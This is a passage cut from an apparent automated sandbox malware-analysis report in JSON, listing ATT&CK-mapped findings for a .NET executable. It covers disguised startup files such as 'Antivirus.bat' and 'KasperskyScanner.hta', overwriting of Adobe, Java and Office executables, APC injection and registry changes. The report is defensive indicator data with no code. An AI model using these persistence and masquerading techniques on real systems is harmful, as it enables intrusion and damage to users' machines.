\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"xlsrvintl.dll\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"xlsrvintl.dll\" was detected as \".NET\" and name: \"Library\"\n \"xlsrvintl.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67AB4E4F.bin\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"DISMHOST.EXE.67AB4E4F.bin\" was detected as \".NET\" and name: \"Library\"\n \"DISMHOST.EXE.67AB4E4F.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"xlsrvintl.dll\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"DISMHOST.EXE.67AB4E4F.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"xlsrvintl.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"Antivirus.bat\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat]- [targetUID: 00000000-00005796]\n Dropped file: \"Antivirus3.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005796]\n Dropped file: \"KasperskyScanner.hta\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005796]\n Dropped file: \"Antivirus2.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs]- [targetUID: 00000000-00005796]\n Dropped file: \"YourMomIsGay.html\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html]- [targetUID: 00000000-00005796]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"xlsrvintl.dll\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"DISMHOST.EXE.67AB4E4F.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe.config\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Nominatus_T7fc20cc6#\\\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.INI\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe.Local\\\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\VMware\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\hosts\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\lmhosts.sam\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\networks\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\protocol\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\services\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS32.mp3\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" connecting to \"\\ThemeApiPort\"\n \"wmplayer.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"NtQueueApcThread\" (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARMHelper.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Adobe AIR Application Installer.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\Adobe AIR Updater.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\airappinstaller.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\template.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jaureg.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jucheck.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jusched.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DW20.EXE\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ConvertInkStore.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkWatson.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\pipanel.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\FLTLDR.EXE\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\LICLUA.EXE\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOICONS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearm.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearmhelper.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\armsvc.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\adobe air application installer.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\adobe air updater.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\airappinstaller.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\template.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jaureg.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jucheck.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jusched.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-17", "type": 6, "relevance": 10, "name": "Scans for the windows taskbar (may be used for explorer injection)", "description": "\"wmplayer.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: 